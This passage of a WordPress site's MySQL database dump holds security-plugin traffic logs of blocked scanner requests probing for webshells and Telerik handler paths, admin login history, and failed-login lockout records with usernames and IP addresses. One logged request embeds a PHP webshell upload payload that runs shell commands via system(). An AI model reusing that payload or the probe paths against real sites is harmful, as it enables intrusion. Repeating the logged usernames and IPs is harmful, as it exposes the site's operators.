3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/1234.php\"}','9eM4bZK2UFt5IRoGvylj7awT',0,1675114453.0408,201,'','GET',403,0,700,0,1,'',0),('110.190.178.231',1857991399,'','https://www.dailyjolly.co.uk/wp-includes/x.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/x.php\"}','guedA3GcSUzOEwLqXpmPTNt1',0,1675114453.1174,199,'','GET',403,0,700,0,1,'',0),('43.130.118.66',729970242,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','NmthJRpO3dZacLuzHTC75yBf',0,1675116485.8484,197,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-reset.php\"}','gsIA157kJi8UQE42mzlvNufy',0,1675116839.5249,228,'','GET',403,0,700,0,1,'',0),('43.130.118.66',729970242,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','c3xrKiwvU9qGO2a6fJAlo7S1',0,1675122407.3979,217,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','IdfYrZ1uNQ8tBwTpRclMhjbe',0,1675128237.0357,255,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','n6HzSkvjK1pIOled5VNaUAXF',0,1675128239.2812,183,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','sidHtQ4AyfCaExmbgTW2YKqe',0,1675128241.5658,189,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','fkqmb2dtihoDRCaQSENlrWzX',0,1675128242.6601,198,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/App_Master/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','8ZxJFBTAp7RvQyzYf14ugrlN',0,1675128244.2885,165,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','Vros75hiO6y8g9nqS4cHjNaR',0,1675128248.4160,199,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','aRAUdmJDTwNPOSp8H4eEsMiv',0,1675128250.3366,192,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','3XlEk6S7aVLpY2hvBsTbGmP1',0,1675128252.4328,168,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','J0lXCw1zc4eDNT9RQY5HuhOs',0,1675128254.9751,195,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','6J2r4CHSEe0GwMknp8zFoiNU',0,1675128257.5771,159,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/Telerik.Web.UI.DialogHandler.axd','','{\"1\":\"python-requests\\/2.27.1\"}','40tOMfT6AQnjBw95DK2UGcC8',0,1675128259.0584,181,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','iz6RWy4b0JkpBIU8AhnmHqaS',0,1675128260.8605,170,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.dailyjolly.co.uk/DesktopModule/UIYKienCuTri/Telerik.Web.UI.DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','P64eWpOXBv5bwofsT8g0JAnk',0,1675128264.7212,191,'','GET',403,0,700,0,1,'',0),('4.233.147.230',82416614,'','https://www.dailyjolly.co.uk/wp-22.php?sfilename=1975.php&sfilecontent=%3C?=echo%20system($_GET%5B%22ll%22%5D;%20);&supfiles=1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2wLDXkIoEM7N0ydTUK3FtabB',0,1675197120.3313,328,'','GET',403,0,700,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_debug_log`
--

DROP TABLE IF EXISTS `wp_aiowps_debug_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_debug_log` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `level` varchar(25) NOT NULL DEFAULT '',
  `message` text NOT NULL DEFAULT '',
  `type` varchar(25) NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_debug_log`
--

LOCK TABLES `wp_aiowps_debug_log` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_debug_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_debug_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_events`
--

DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) NOT NULL DEFAULT '',
  `username` varchar(150) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) DEFAULT NULL,
  `referer_info` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `country_code` varchar(50) DEFAULT NULL,
  `event_data` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_events`
--

LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_failed_logins`
--

LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) NOT NULL,
  `meta_key2` varchar(255) NOT NULL,
  `meta_key3` varchar(255) NOT NULL,
  `meta_key4` varchar(255) NOT NULL,
  `meta_key5` varchar(255) NOT NULL,
  `meta_value1` varchar(255) NOT NULL,
  `meta_value2` text NOT NULL,
  `meta_value3` text NOT NULL,
  `meta_value4` longtext NOT NULL,
  `meta_value5` longtext NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_global_meta`
--

LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_ip` varchar(100) NOT NULL DEFAULT '',
  `login_country` varchar(150) NOT NULL DEFAULT '',
  `browser_type` varchar(150) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_activity`
--

LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'dailyjolly','2017-10-06 08:43:08','0000-00-00 00:00:00','217.206.184.92','',''),(2,1,'dailyjolly','2017-10-23 09:56:11','0000-00-00 00:00:00','217.206.184.92','',''),(3,1,'dailyjolly','2017-10-25 15:13:22','0000-00-00 00:00:00','217.206.184.92','',''),(4,1,'dailyjolly','2017-11-02 16:48:24','0000-00-00 00:00:00','217.206.184.92','',''),(5,1,'dailyjolly','2017-11-10 12:10:30','0000-00-00 00:00:00','217.206.184.92','',''),(6,1,'dailyjolly','2018-03-06 13:56:08','0000-00-00 00:00:00','109.174.168.67','',''),(7,1,'dailyjolly','2018-03-21 08:48:12','0000-00-00 00:00:00','185.175.113.71','',''),(8,1,'dailyjolly','2018-10-19 10:54:36','0000-00-00 00:00:00','185.175.113.75','',''),(9,1,'dailyjolly','2019-05-31 11:30:23','0000-00-00 00:00:00','185.175.113.75','',''),(10,1,'dailyjolly','2019-05-31 15:13:21','0000-00-00 00:00:00','185.175.113.75','',''),(11,1,'dailyjolly','2020-10-08 11:40:26','0000-00-00 00:00:00','185.175.113.72','',''),(12,1,'dailyjolly','2020-10-08 11:40:33','0000-00-00 00:00:00','185.175.113.72','',''),(13,1,'dailyjolly','2021-01-25 17:06:50','0000-00-00 00:00:00','37.188.32.3','',''),(14,1,'admin','2021-08-19 14:10:56','1000-10-10 10:00:00','185.175.113.72','',''),(15,1,'AAD22133312errousGTRF44','2022-04-13 10:16:09','1000-10-10 10:00:00','185.175.113.72','',''),(16,1,'AAD22133312errousGTRF44','2022-04-13 10:22:12','1000-10-10 10:00:00','185.175.113.72','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) NOT NULL DEFAULT '',
  `lock_reason` varchar(128) NOT NULL DEFAULT '',
  `unlock_key` varchar(128) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=167 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_lockdown`
--

LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_lockdown` VALUES (1,1,'admin','2021-06-29 20:07:08','2021-06-29 21:07:08','104.42.178.246','login_fail',''),(2,1,'admin','2021-06-29 21:07:10','2021-06-29 22:07:10','104.42.178.246','login_fail',''),(3,1,'admin','2021-06-30 11:15:08','2021-06-30 12:15:08','40.88.136.252','login_fail',''),(4,1,'admin','2021-07-03 02:00:01','2021-07-03 03:00:01','104.207.155.217','login_fail',''),(5,1,'admin','2021-07-03 20:18:20','2021-07-03 21:18:20','40.78.136.54','login_fail',''),(6,0,'dailyjolly','2021-07-03 21:10:17','2021-07-03 22:10:17','197.0.88.46','login_fail',''),(7,1,'admin','2021-07-03 21:25:41','2021-07-03 22:25:41','159.89.49.186','login_fail',''),(8,0,'eunkyoung5736','2021-07-05 12:51:12','2021-07-05 13:51:12','20.96.201.62','login_fail',''),(9,0,'jainico','2021-07-05 14:17:13','2021-07-05 15:17:13','20.96.201.62','login_fail',''),(10,1,'admin','2021-07-05 19:16:32','2021-07-05 20:16:32','40.88.136.252','login_fail',''),(11,1,'admin','2021-07-05 20:30:47','2021-07-05 21:30:47','143.244.128.164','login_fail',''),(12,0,'rashani','2021-07-06 04:23:25','2021-07-06 05:23:25','134.209.218.162','login_fail',''),(13,1,'admin','2021-07-06 17:59:18','2021-07-06 18:59:18','192.236.177.123','login_fail',''),(14,1,'admin','2021-07-07 14:50:26','2021-07-07 15:50:26','188.166.219.70','login_fail',''),(15,0,'pathildev','2021-07-07 22:13:16','2021-07-07 23:13:16','62.210.180.176','login_fail',''),(16,1,'admin','2021-07-08 11:27:53','2021-07-08 12:27:53','185.147.34.111','login_fail',''),(17,1,'admin','2021-07-08 14:45:27','2021-07-08 15:45:27','40.66.44.97','login_fail',''),(18,1,'admin','2021-07-08 16:51:08','2021-07-08 17:51:08','34.136.74.64','login_fail',''),(19,0,'yith','2021-07-08 17:32:27','2021-07-08 18:32:27','202.29.210.60','login_fail',''),(20,0,'yith','2021-07-08 18:32:33','2021-07-08 19:32:33','202.29.210.60','login_fail',''),(21,1,'admin','2021-07-11 02:03:23','2021-07-11 03:03:23','3.15.32.27','login_fail',''),(22,1,'admin','2021-07-11 10:47:45','2021-07-11 11:47:45','128.199.206.213','login_fail',''),(23,1,'admin','2021-07-11 11:28:43','2021-07-11 12:28:43','188.213.31.175','login_fail',''),(24,1,'admin','2021-07-11 12:34:29','2021-07-11 13:34:29','40.84.238.162','login_fail',''),(25,1,'admin','2021-07-11 12:59:32','2021-07-11 13:59:32','176.100.4.169','login_fail',''),(26,1,'admin','2021-07-11 13:59:33','2021-07-11 14:59:33','176.100.4.169','login_fail',''),(27,1,'admin','2021-07-11 23:46:48','2021-07-12 00:46:48','193.0.216.104','login_fail',''),(28,1,'admin','2021-07-12 22:01:39','2021-07-12 23:01:39','54.155.237.57','login_fail',''),(29,1,'admin','2021-07-13 01:21:27','2021-07-13 02:21:27','151.80.148.178','login_fail',''),(30,1,'admin','2021-07-13 08:03:28','2021-07-13 09:03:28','95.142.120.8','login_fail',''),(31,1,'admin','2021-07-13 19:08:38','2021-07-13 20:08:38','159.89.49.186','login_fail',''),(32,1,'admin','2021-07-14 10:33:34','2021-07-14 11:33:34','54.84.22.22','login_fail',''),(33,1,'admin','2021-07-14 11:33:50','2021-07-14 12:33:50','54.84.22.22','login_fail',''),(34,1,'admin','2021-07-14 12:34:01','2021-07-14 13:34:01','54.84.22.22','login_fail',''),(35,1,'admin','2021-07-14 13:34:12','2021-07-14 14:34:12','54.84.22.22','login_fail',''),(36,1,'admin','2021-07-14 14:34:25','2021-07-14 15:34:25','54.84.22.22','login_fail',''),(37,1,'admin','2021-07-14 15:34:35','2021-07-14 16:34:35','54.84.22.22','login_fail',''),(38,0,'tester','2021-07-15 16:09:13','2021-07-15 17:09:13','178.218.162.117','login_fail',''),(39,1,'admin','2021-07-16 04:15:17','2021-07-16 05:15:17','103.81.195.218','login_fail',''),(40,0,'nicola','2021-07-16 10:10:33','2021-07-16 11:10:33','62.210.38.233','login_fail',''),(41,0,'santiago-valverde','2021-07-18 09:18:30','2021-07-18 10:18:30','62.210.140.62','login_fail',''),(42,1,'admin','2021-07-18 20:44:41','2021-07-18 21:44:41','159.89.49.186','login_fail',''),(43,0,'dailyjolly','2021-07-18 21:24:00','2021-07-18 22:24:00','159.65.118.130','login_fail',''),(44,0,'dailyjolly','2021-07-18 21:52:21','2021-07-18 22:52:21','40.124.139.91','login_fail',''),(45,1,'admin','2021-07-19 03:12:04','2021-07-19 04:12:04','52.146.89.2','login_fail',''),(46,1,'admin','2021-07-19 09:23:17','2021-07-19 10:23:17','62.210.99.33','login_fail',''),(47,1,'admin','2021-07-19 15:58:53','2021-07-19 16:58:53','5.29.18.186','login_fail',''),(48,0,'dailyjolly','2021-07-19 19:30:42','2021-07-19 20:30:42','40.124.139.91','login_fail',''),(49,0,'dailyjolly','2021-07-19 21:19:15','2021-07-19 22:19:15','159.65.118.130','login_fail',''),(50,0,'justin-marsh','2021-07-19 23:34:22','2021-07-20 00:34:22','62.210.140.161','login_fail',''),(51,1,'admin','2021-07-20 09:58:08','2021-07-20 10:58:08','20.65.48.40','login_fail',''),(52,0,'webmaster@dailyjolly.co.uk','2021-07-20 12:55:32','2021-07-20 13:55:32','45.184.251.162','login_fail',''),(53,0,'webmaster@dailyjolly.co.uk','2021-07-20 12:55:32','2021-07-20 13:55:32','45.184.251.162','login_fail',''),(54,1,'admin','2021-07-20 16:52:46','2021-07-20 17:52:46','115.164.88.204','login_fail',''),(55,1,'admin','2021-07-20 16:52:46','2021-07-20 17:52:46','115.164.88.204','login_fail',''),(56,0,'shsabbir','2021-07-21 01:24:36','2021-07-21 02:24:36','91.205.160.96','login_fail',''),(57,0,'user','2021-07-21 02:25:34','2021-07-21 03:25:34','58.233.122.4','login_fail',''),(58,0,'dailyjolly.co.uk','2021-07-21 02:26:36','2021-07-21 03:26:36','211.63.188.139','login_fail',''),(59,0,'wpbakery','2021-07-21 05:03:43','2021-07-21 06:03:43','40.69.204.81','login_fail',''),(60,0,'seguinadmin','2021-07-21 08:29:14','2021-07-21 09:29:14','195.154.200.175','login_fail',''),(61,0,'deroosryangmail-com','2021-07-28 09:38:32','2021-07-28 10:38:32','62.210.140.247','login_fail',''),(62,1,'admin','2021-07-28 11:25:30','2021-07-28 12:25:30','40.83.251.158','login_fail',''),(63,0,'daisuke-mikiko','2021-07-28 13:23:22','2021-07-28 14:23:22','194.182.178.13','login_fail',''),(64,0,'dmrlady','2021-07-28 23:53:35','2021-07-29 00:53:35','62.210.84.49','login_fail',''),(65,0,'dailyjolly','2021-07-29 18:21:58','2021-07-29 19:21:58','87.65.203.65','login_fail',''),(66,0,'dailyjolly','2021-07-29 18:22:24','2021-07-29 19:22:24','180.231.222.41','login_fail',''),(67,0,'dailyjolly','2021-07-29 18:22:43','2021-07-29 19:22:43','122.185.137.98','login_fail',''),(68,0,'dailyjolly','2021-07-29 18:25:13','2021-07-29 19:25:13','197.210.131.94','login_fail',''),(69,0,'dailyjolly','2021-07-29 18:25:43','2021-07-29 19:25:43','103.196.11.38','login_fail',''),(70,0,'dailyjolly','2021-07-29 18:26:05','2021-07-29 19:26:05','115.84.112.138','login_fail',''),(71,0,'dailyjolly','2021-07-29 18:26:19','2021-07-29 19:26:19','186.179.100.135','login_fail',''),(72,0,'dailyjolly','2021-07-29 18:28:55','2021-07-29 19:28:55','14.232.208.8','login_fail',''),(73,0,'dailyjolly','2021-07-29 18:29:12','2021-07-29 19:29:12','5.128.122.193','login_fail',''),(74,0,'dailyjolly','2021-07-29 18:29:13','2021-07-29 19:29:13','5.128.122.193','login_fail',''),(75,0,'dailyjolly','2021-07-29 18:31:18','2021-07-29 19:31:18','190.3.205.213','login_fail',''),(76,0,'dailyjolly','2021-07-29 18:37:10','2021-07-29 19:37:10','5.101.197.161','login_fail',''),(77,0,'dailyjolly','2021-07-29 18:37:10','2021-07-29 19:37:10','5.101.197.161','login_fail',''),(78,0,'dailyjolly','2021-07-29 18:37:17','2021-07-29 19:37:17','24.120.10.18','login_fail',''),(79,0,'dailyjolly','2021-07-29 18:37:33','2021-07-29 19:37:33','125.34.240.29','login_fail',''),(80,0,'dailyjolly','2021-07-29 18:37:33','2021-07-29 19:37:33','125.34.240.29','login_fail',''),(81,0,'dailyjolly','2021-07-29 18:37:38','2021-07-29 19:37:38','24.116.231.202','login_fail',''),(82,0,'dailyjolly','2021-07-29 18:38:54','2021-07-29 19:38:54','186.179.100.29','login_fail',''),(83,0,'dailyjolly','2021-07-29 18:39:35','2021-07-29 19:39:35','186.215.197.15','login_fail',''),(84,0,'dailyjolly','2021-07-29 18:45:41','2021-07-29 19:45:41','103.219.147.28','login_fail',''),(85,0,'dailyjolly','2021-07-29 18:45:41','2021-07-29 19:45:41','103.219.147.28','login_fail',''),(86,0,'dailyjolly','2021-07-29 18:45:56','2021-07-29 19:45:56','222.118.4.109','login_fail',''),(87,0,'dailyjolly','2021-07-29 18:45:56','2021-07-29 19:45:56','222.118.4.109','login_fail',''),(88,0,'dailyjolly','2021-07-29 18:46:34','2021-07-29 19:46:34','177.107.68.22','login_fail',''),(89,0,'dailyjolly','2021-07-29 18:47:51','2021-07-29 19:47:51','200.87.73.51','login_fail',''),(90,0,'dailyjolly','2021-07-29 18:48:13','2021-07-29 19:48:13','103.1.94.139','login_fail',''),(91,0,'dailyjolly','2021-07-29 18:48:19','2021-07-29 19:48:19','123.63.30.201','login_fail',''),(92,0,'dailyjolly','2021-07-29 18:48:19','2021-07-29 19:48:19','123.63.30.201','login_fail',''),(93,0,'dailyjolly','2021-07-29 18:49:30','2021-07-29 19:49:30','201.48.245.153','login_fail',''),(94,0,'dailyjolly','2021-07-29 18:52:11','2021-07-29 19:52:11','183.80.199.150','login_fail',''),(95,0,'dailyjolly','2021-07-29 18:52:31','2021-07-29 19:52:31','200.146.227.146','login_fail',''),(96,0,'dailyjolly','2021-07-29 18:54:48','2021-07-29 19:54:48','89.21.77.158','login_fail',''),(97,0,'dailyjolly','2021-07-29 18:55:23','2021-07-29 19:55:23','103.99.149.250','login_fail',''),(98,0,'dailyjolly','2021-07-29 18:55:39','2021-07-29 19:55:39','200.205.134.107','login_fail',''),(99,0,'dailyjolly','2021-07-29 18:57:30','2021-07-29 19:57:30','84.217.240.49','login_fail',''),(100,0,'dailyjolly','2021-07-29 19:00:50','2021-07-29 20:00:50','31.32.208.250','login_fail',''),(101,0,'dailyjolly','2021-07-29 19:00:55','2021-07-29 20:00:55','103.194.243.188','login_fail',''),(102,0,'dailyjolly','2021-07-29 19:01:30','2021-07-29 20:01:30','186.179.100.125','login_fail',''),(103,0,'dailyjolly','2021-07-29 19:03:33','2021-07-29 20:03:33','103.87.24.82','login_fail',''),(104,0,'dailyjolly','2021-07-29 19:03:42','2021-07-29 20:03:42','27.71.207.190','login_fail',''),(105,0,'maurits','2021-07-31 07:50:04','2021-07-31 08:50:04','62.210.99.33','login_fail',''),(106,0,'user','2021-07-31 10:12:16','2021-07-31 11:12:16','112.169.209.138','login_fail',''),(107,0,'dailyjolly.co.uk','2021-07-31 10:12:46','2021-07-31 11:12:46','110.15.37.220','login_fail',''),(108,1,'admin','2021-08-01 10:34:39','2021-08-01 11:34:39','3.81.29.135','login_fail',''),(109,1,'admin','2021-08-01 17:25:03','2021-08-01 18:25:03','151.80.148.178','login_fail',''),(110,0,'michael-pereira','2021-08-02 03:57:53','2021-08-02 04:57:53','62.210.38.233','login_fail',''),(111,0,'user','2021-08-02 12:22:44','2021-08-02 13:22:44','59.147.234.181','login_fail',''),(112,0,'dailyjolly.co.uk','2021-08-02 12:23:04','2021-08-02 13:23:04','218.219.19.14','login_fail',''),(113,1,'admin','2021-08-02 14:21:22','2021-08-02 15:21:22','177.73.71.212','login_fail',''),(114,0,'user','2021-08-02 16:13:15','2021-08-02 17:13:15','211.44.80.66','login_fail',''),(115,0,'dailyjolly.co.uk','2021-08-02 16:13:26','2021-08-02 17:13:26','188.16.21.111','login_fail',''),(116,1,'admin','2021-08-02 21:26:50','2021-08-02 22:26:50','62.210.99.33','login_fail',''),(117,1,'admin','2021-08-03 10:15:03','2021-08-03 11:15:03','35.161.212.182','login_fail',''),(118,1,'admin','2021-08-03 21:21:07','2021-08-03 22:21:07','54.219.60.191','login_fail',''),(119,1,'admin','2021-08-04 02:37:36','2021-08-04 03:37:36','20.102.79.244','login_fail',''),(120,1,'admin','2021-08-04 04:41:26','2021-08-04 05:41:26','95.181.152.71','login_fail',''),(121,0,'user','2021-08-05 05:31:32','2021-08-05 06:31:32','1.224.149.17','login_fail',''),(122,0,'administrator','2021-08-05 05:31:53','2021-08-05 06:31:53','211.108.253.102','login_fail',''),(123,0,'user','2021-08-05 07:07:27','2021-08-05 08:07:27','150.249.39.105','login_fail',''),(124,0,'dailyjolly.co.uk','2021-08-05 07:07:52','2021-08-05 08:07:52','153.151.173.122','login_fail',''),(125,0,'dailyjolly','2021-08-06 12:44:06','2021-08-06 13:44:06','197.2.80.182','login_fail',''),(126,1,'admin','2021-08-06 14:58:38','2021-08-06 15:58:38','40.80.151.240','login_fail',''),(127,1,'admin','2021-08-06 16:23:30','2021-08-06 17:23:30','62.210.247.19','login_fail',''),(128,1,'admin','2021-08-06 16:44:33','2021-08-06 17:44:33','192.236.177.124','login_fail',''),(129,0,'garethr','2021-08-06 20:41:30','2021-08-06 21:41:30','167.71.183.56','login_fail',''),(130,1,'admin','2021-08-06 21:25:45','2021-08-06 22:25:45','13.211.79.100','login_fail',''),(131,0,'webmaster@dailyjolly.co.uk','2021-08-07 11:59:09','2021-08-07 12:59:09','178.255.168.42','login_fail',''),(132,0,'webmaster@dailyjolly.co.uk','2021-08-07 11:59:09','2021-08-07 12:59:09','178.255.168.42','login_fail',''),(133,0,'boleng','2021-08-08 19:38:42','2021-08-08 20:38:42','159.100.250.39','login_fail',''),(134,1,'admin','2021-08-10 13:35:19','2021-08-10 14:35:19','3.137.205.36','login_fail',''),(135,1,'admin','2021-08-10 14:35:41','2021-08-10 15:35:41','3.137.205.36','login_fail',''),(136,1,'admin','2021-08-10 15:37:15','2021-08-10 16:37:15','3.137.205.36','login_fail',''),(137,1,'admin','2021-08-10 16:41:23','2021-08-10 17:41:23','3.137.205.36','login_fail',''),(138,1,'admin','2021-08-10 17:41:36','2021-08-10 18:41:36','3.137.205.36','login_fail',''),(139,1,'admin','2021-08-10 18:42:27','2021-08-10 19:42:27','3.137.205.36','login_fail',''),(140,1,'admin','2021-08-11 01:00:34','2021-08-11 02:00:34','54.188.194.240','login_fail',''),(141,1,'admin','2021-08-11 01:33:59','2021-08-11 02:33:59','89.145.161.126','login_fail',''),(142,1,'admin','2021-08-11 02:00:39','2021-08-11 03:00:39','54.188.194.240','login_fail',''),(143,0,'countygranite','2021-08-11 